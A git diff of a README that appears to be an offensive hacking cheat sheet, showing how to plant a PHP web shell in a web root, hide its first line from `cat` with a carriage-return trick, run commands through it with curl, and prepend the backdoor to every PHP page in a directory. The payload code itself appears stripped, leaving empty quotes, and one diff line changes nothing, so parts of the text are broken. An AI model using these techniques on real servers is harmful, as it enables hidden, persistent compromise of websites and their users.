diff --git a/README.md b/README.md index e42deb9..26079c1 100644 --- a/README.md +++ b/README.md @@ -1042,7 +1042,7 @@ Hide from `cat` with a [simple carriage return](https://www.hahwul.com/2019/01/2 ```sh ### The first line will be hidden from cat cd /var/www/html -echo ''$'\r''' >test.php +echo ''$'\r''' >test.php ``` Note the `$'\r'`: It will move the cursor back and then overwrite with the following line. @@ -1055,7 +1055,7 @@ curl http://127.0.0.1:8080/test.php ### With executing a command curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id" ``` -Alternatively add ```` to the beginning of any existing PHP page: +Alternatively add the backdoor ```` to the beginning of every existing PHP page: ```sh for f in *.php; do